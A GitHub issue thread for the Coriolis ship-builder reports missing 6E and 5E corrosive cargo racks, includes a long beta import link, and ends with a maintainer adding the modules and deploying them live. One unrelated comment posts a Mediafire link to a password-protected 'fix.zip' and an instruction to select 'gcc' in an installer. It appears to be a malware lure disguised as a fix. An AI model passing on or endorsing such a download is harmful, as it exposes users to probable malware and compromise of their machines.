### ISSUE TITLE
6E corrosion cargo racks are missing

### ISSUE THREAD

**Issue by MartindForlon** [EDCD/coriolis#783]
You can check code here: have one of them (6E corrosive) added into T-8 inernals (using beta corriolis site).

https://beta.coriolis.io/import?data=H4sIANrszWYC_-1aa2_juBX9K4bQj4mgt-X000y82WQ32UnjYBZoUQi0RNtsKFKlqGTdwf73Xkq2Q8kP0ROj6ADOhxk4EQ-veO8590F_sx54VlFcWlf_-GbdSZxbV9aikElOGGFzikoskhn5A2dJjjNS5daF9YVZV1JU-MJ6FIQLIpfWlX9hTSiXsPihfuwWiazghEnX-vPim_UTmxOGsQBI6-qb9ZlWuIAP8m5sXbleHA39yA0u3n__G8oxYP2OUcFZcs_Z_AmxOYbN10jw1wmmmOHBLxgx7Q8K0nccz3Xgd38UsGeOmUT0p9kMp8rAssApQTQhLMUsI0gsE8ErlpXWrgWweYooKXEGS-82SwZP6yX3-BVT6yq8UCdJZgSL5izv0VT9HtZIPK8PST1blnflz5wDGJj3RRCwGdGvCN7bugocG365-uDBB3Vya5hH_obFWKC3Doy7BePY4QbFsb1QRxmjHM3xIxYTnHKW9ZrkaRa59qgFRUopyLSS3Mwst2XWsGXW8wKLHNF7jrJenLZJjqfjPKA_SF7l61g5_G6h0zrv-uP2WT0vCwVVPzWRKuz-UltL0r9qv25FyeptrG2wG0Qpn83M7PN32ffPC-tvFeykOFfbe5izJdhBeyk7UU-dGXtm7JmxPyRjvdrwLdgETcWUgs8_AB2cxeAsBmcx-IHEIDwz9szYM2N_IMZGteGf8pzfsWtKitoJzcdbXhSKesFFD6NHjusBqbcZ_UDKNLnFSE4Ie7lGBUobZrTYO1I_G2a5-5ilbFp5_KhADtp-fsIU4u4ZWN8fw7pH3KEdtvzhdv2xgPcs4T0pqlgKQZHISggsE0nYco9TvI1TnuGho5ugYbxDRScLgmn2mfNSgg1w-K_LcdU69ZrOGRl8RVKFLtuhp_DTo6dlvc10tU26qNjLsl9SJxX8ebCKBC5MFPUBlWWvq3xNbtyOx4-Q5FhzeBjarorM4ffpsmt7mnC1ZRnPMKSW9es2DnuoqCQFhc_90Q1xqX6CzQZD346HYKu-y6_gT0nSJ1yCdCPYrxdXD_dL0H_1E28J92khIV4oL8kr_jDoQW62o7Uk_8FOkoJ0luFxzPTOzDwz88zM_0Nm-qbMVLXGYWauDvOH5eXpo9iL2sT9YAQDmuJEdLoI9kI7DMBk96QRvLHzfxLBgT5Ik9CIxEnK05eCyD047ntJvyDF9epZDSRXt2tIpEjM-RQtM85Fb3dwrR6-RTJdmLbywY5U90nkvNqb4z7YyqMG3JRBY4yLwSNFUr3D0eyBV6BycQR7hqNG97QkE0Z25MROu3s9nkOX28S8hLYkUMkwOCGXbBe6Tyf8KJUu_dVJRO_m-pE9iiEnHKBUE_krH88FyrDbG_9NuJlmgGhHwNblAwQJk0kDhrN2zN5igQbPiJEd0j_qi9hCoRc1-oLMF-kCSIb7I_eBM6UpODtVMdbuaH3bc7qaaV6SuU6kB43foLneVlGm9f29eUdLOT4Ej-O3axI1SoBzIikBii4NZmOBNoTyQ29_1EEk6F5SKh4eVvH36HuPHVPJDHfUIM2yZExEVy4fBZ_Be3IxeATTd0mm1xeAuAHnr1io8UcT3D2yKdB8MBbA-dPOPdtxM3JsVwVh9H21fGS77zob2XEYtISwOacvhSQ5ojsYsm1d3BrLDv2wXfhsAB-xmHFVChoIodsa7bkB1CpKFt1tYBXfT1BjGvQwvqbXXhwfjuyV-w2i2nn_Kg0irLGqNA3r0Q5hvZmM9030bzAlShgGN0iUuE6tncB2e4vqWZmpwdurQR2g_D94QAzNV1n8BILqtRJn9L3trdvCGUHPqIrZ4HtvBCJN9aJW6wneOIYNrjsM9dCNR9DBq847OhxvC8jhIlPaUUtOk--OE9UbAfEDde1M1hqkl7VqB0pAEqui4KIRa7_B9XpL7ntYOGkWmtYL_mhPvaBdiiS3kNdvBP53tcpMWpxDOTYYv2FKd4Z4bFQ8ZNpWM1RK48aRs6wi0kTCm-u30jhd-_qU3RvZbux3RggrxCe8KXh6ELVZUWh7w3hbIc3NgwKidb-mgnYbztg21x5pihtHYavQmSyhUMtPZtwK7iPG9Vc6ekgpCgWmXWs39k14NAwc1w93TF4wg8JmX4Z4JiDXgxvgasXwjrpn6GzCOviYjmvu8O22L2oLn5Uf5CRF7BObU5PrPN3BXnvMaHYjGMRRqxYZDqPOleCWX8va1vI4RXxCGRJdfZ1VmEKb96KLtt8v2rAKeqSXLlqu2udMcKbuoaXgNKkYiLoo1VgMNhgeDj3t7hL-c9xkotZ0N6nHHAKljc1RA9nfO9aQXg0ZnRLS3wPJhYBOmrNCcD77yAbB7g1ax5xyyDqphO1Msm_nnMN6A9OvdMT-3sHqz5hB96x05gkTBnVz2u2u7zEZXC9wVU9ouhnSM5usJnjVGRokx3t-ma1rqcNZ0bzuCu0g0m6d_aiVvjYnMZECynG56Bf1sP0NESXs3Xb9s-AvmD3hOfyz3Tfsuhj3A33Q43RyIhbzJbQ2NeCRhWbot3PY8fOt7XlRMLKhpugMzo6fbu0cnNme43YuZr5nytVyUji0Y98LoXI_LNN1LMw3rNCpmUBa5TUNDqt2zdBIY-g-CQCdUTxZ7-MfJQHDeoOgu4HAM_CuWNaI3lGIcY3omdYMobu3ZgBvIZYdO6c7Hd91x3e_TDSZJI9qhg65lVSl0Y3Le_3h9KX5DEtEKM7KSsxQikuoSpj6vsn-L5o4bSeMaie4ulunfDqlOFHjLwwJG9U3TYez0Od6iePthymRrAQzBRrpQBkGtU6kmv8mGM4BO_0941itcXehkIKuYMxAvG2QHN5nKjBEB6RwaB_RKqvSVyzMQH0dtBnJpFUpeU7KBqyZ9B5GamL6mtP1wHuFVyCIjH_xadLMzxeoogh6btfrH1-qlb_waZfkjQ9RAQKC0kUJXSROUPaqVLHfzMdmsVh-Wq2fqPX6FgzIDFsAKMhhQbJkSqEOMrrquhs7J0Nyt2_dFMoLkWkyrXKoIlwjpF-J_Fw_vhcPXAOsNUZ7hocPYL2BaJbGYL-rp_ec2UtFaQnl6tvChB4KUOmwc1K0lhdeOUlxoYpioFbTTR9G-QriiulXtUzHeavHD22KpUvUr0fN3GLNMZBiZebaBdbFKnJAttVVZf0hU1Un9Jo3l6P1A6tkBfkoryfokHfqZ9TXXnmlalQJ9SlUGbmChvIuuHTiS2_47IaQ_K686O_Wn_8FlCaMViE5AAA%3D

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alex-williams** [comment]
I suspect the Corrosive Cargo Rack is missing from the list of modules.

**Comment by LesserHellspawn** [comment]
Size 5 is missing too.

**Comment by alex-williams** [comment]
> You can check code here: have one of them (6E corrosive) added into T-8 inernals (using beta corriolis site).
> 
> https://beta.coriolis.io/import?data=H4sIANrszWYC_-1aa2_juBX9K4bQj4mgt-X000y82WQ32UnjYBZoUQi0RNtsKFKlqGTdwf73Xkq2Q8kP0ROj6ADOhxk4EQ-veO8590F_sx54VlFcWlf_-GbdSZxbV9aikElOGGFzikoskhn5A2dJjjNS5daF9YVZV1JU-MJ6FIQLIpfWlX9hTSiXsPihfuwWiazghEnX-vPim_UTmxOGsQBI6-qb9ZlWuIAP8m5sXbleHA39yA0u3n__G8oxYP2OUcFZcs_Z_AmxOYbN10jw1wmmmOHBLxgx7Q8K0nccz3Xgd38UsGeOmUT0p9kMp8rAssApQTQhLMUsI0gsE8ErlpXWrgWweYooKXEGS-82SwZP6yX3-BVT6yq8UCdJZgSL5izv0VT9HtZIPK8PST1blnflz5wDGJj3RRCwGdGvCN7bugocG365-uDBB3Vya5hH_obFWKC3Doy7BePY4QbFsb1QRxmjHM3xIxYTnHKW9ZrkaRa59qgFRUopyLSS3Mwst2XWsGXW8wKLHNF7jrJenLZJjqfjPKA_SF7l61g5_G6h0zrv-uP2WT0vCwVVPzWRKuz-UltL0r9qv25FyeptrG2wG0Qpn83M7PN32ffPC-tvFeykOFfbe5izJdhBeyk7UU-dGXtm7JmxPyRjvdrwLdgETcWUgs8_AB2cxeAsBmcx-IHEIDwz9szYM2N_IMZGteGf8pzfsWtKitoJzcdbXhSKesFFD6NHjusBqbcZ_UDKNLnFSE4Ie7lGBUobZrTYO1I_G2a5-5ilbFp5_KhADtp-fsIU4u4ZWN8fw7pH3KEdtvzhdv2xgPcs4T0pqlgKQZHISggsE0nYco9TvI1TnuGho5ugYbxDRScLgmn2mfNSgg1w-K_LcdU69ZrOGRl8RVKFLtuhp_DTo6dlvc10tU26qNjLsl9SJxX8ebCKBC5MFPUBlWWvq3xNbtyOx4-Q5FhzeBjarorM4ffpsmt7mnC1ZRnPMKSW9es2DnuoqCQFhc_90Q1xqX6CzQZD346HYKu-y6_gT0nSJ1yCdCPYrxdXD_dL0H_1E28J92khIV4oL8kr_jDoQW62o7Uk_8FOkoJ0luFxzPTOzDwz88zM_0Nm-qbMVLXGYWauDvOH5eXpo9iL2sT9YAQDmuJEdLoI9kI7DMBk96QRvLHzfxLBgT5Ik9CIxEnK05eCyD047ntJvyDF9epZDSRXt2tIpEjM-RQtM85Fb3dwrR6-RTJdmLbywY5U90nkvNqb4z7YyqMG3JRBY4yLwSNFUr3D0eyBV6BycQR7hqNG97QkE0Z25MROu3s9nkOX28S8hLYkUMkwOCGXbBe6Tyf8KJUu_dVJRO_m-pE9iiEnHKBUE_krH88FyrDbG_9NuJlmgGhHwNblAwQJk0kDhrN2zN5igQbPiJEd0j_qi9hCoRc1-oLMF-kCSIb7I_eBM6UpODtVMdbuaH3bc7qaaV6SuU6kB43foLneVlGm9f29eUdLOT4Ej-O3axI1SoBzIikBii4NZmOBNoTyQ29_1EEk6F5SKh4eVvH36HuPHVPJDHfUIM2yZExEVy4fBZ_Be3IxeATTd0mm1xeAuAHnr1io8UcT3D2yKdB8MBbA-dPOPdtxM3JsVwVh9H21fGS77zob2XEYtISwOacvhSQ5ojsYsm1d3BrLDv2wXfhsAB-xmHFVChoIodsa7bkB1CpKFt1tYBXfT1BjGvQwvqbXXhwfjuyV-w2i2nn_Kg0irLGqNA3r0Q5hvZmM9030bzAlShgGN0iUuE6tncB2e4vqWZmpwdurQR2g_D94QAzNV1n8BILqtRJn9L3trdvCGUHPqIrZ4HtvBCJN9aJW6wneOIYNrjsM9dCNR9DBq847OhxvC8jhIlPaUUtOk--OE9UbAfEDde1M1hqkl7VqB0pAEqui4KIRa7_B9XpL7ntYOGkWmtYL_mhPvaBdiiS3kNdvBP53tcpMWpxDOTYYv2FKd4Z4bFQ8ZNpWM1RK48aRs6wi0kTCm-u30jhd-_qU3RvZbux3RggrxCe8KXh6ELVZUWh7w3hbIc3NgwKidb-mgnYbztg21x5pihtHYavQmSyhUMtPZtwK7iPG9Vc6ekgpCgWmXWs39k14NAwc1w93TF4wg8JmX4Z4JiDXgxvgasXwjrpn6GzCOviYjmvu8O22L2oLn5Uf5CRF7BObU5PrPN3BXnvMaHYjGMRRqxYZDqPOleCWX8va1vI4RXxCGRJdfZ1VmEKb96KLtt8v2rAKeqSXLlqu2udMcKbuoaXgNKkYiLoo1VgMNhgeDj3t7hL-c9xkotZ0N6nHHAKljc1RA9nfO9aQXg0ZnRLS3wPJhYBOmrNCcD77yAbB7g1ax5xyyDqphO1Msm_nnMN6A9OvdMT-3sHqz5hB96x05gkTBnVz2u2u7zEZXC9wVU9ouhnSM5usJnjVGRokx3t-ma1rqcNZ0bzuCu0g0m6d_aiVvjYnMZECynG56Bf1sP0NESXs3Xb9s-AvmD3hOfyz3Tfsuhj3A33Q43RyIhbzJbQ2NeCRhWbot3PY8fOt7XlRMLKhpugMzo6fbu0cnNme43YuZr5nytVyUji0Y98LoXI_LNN1LMw3rNCpmUBa5TUNDqt2zdBIY-g-CQCdUTxZ7-MfJQHDeoOgu4HAM_CuWNaI3lGIcY3omdYMobu3ZgBvIZYdO6c7Hd91x3e_TDSZJI9qhg65lVSl0Y3Le_3h9KX5DEtEKM7KSsxQikuoSpj6vsn-L5o4bSeMaie4ulunfDqlOFHjLwwJG9U3TYez0Od6iePthymRrAQzBRrpQBkGtU6kmv8mGM4BO_0941itcXehkIKuYMxAvG2QHN5nKjBEB6RwaB_RKqvSVyzMQH0dtBnJpFUpeU7KBqyZ9B5GamL6mtP1wHuFVyCIjH_xadLMzxeoogh6btfrH1-qlb_waZfkjQ9RAQKC0kUJXSROUPaqVLHfzMdmsVh-Wq2fqPX6FgzIDFsAKMhhQbJkSqEOMrrquhs7J0Nyt2_dFMoLkWkyrXKoIlwjpF-J_Fw_vhcPXAOsNUZ7hocPYL2BaJbGYL-rp_ec2UtFaQnl6tvChB4KUOmwc1K0lhdeOUlxoYpioFbTTR9G-QriiulXtUzHeavHD22KpUvUr0fN3GLNMZBiZebaBdbFKnJAttVVZf0hU1Un9Jo3l6P1A6tkBfkoryfokHfqZ9TXXnmlalQJ9SlUGbmChvIuuHTiS2_47IaQ_K686O_Wn_8FlCaMViE5AAA%3D

Added to the beta site, if you wouldn't mind confirming, I'll push it to live as well. Also added the 5E as per @LesserHellspawn

**Comment by alex-williams** [comment]
Now deployed to live
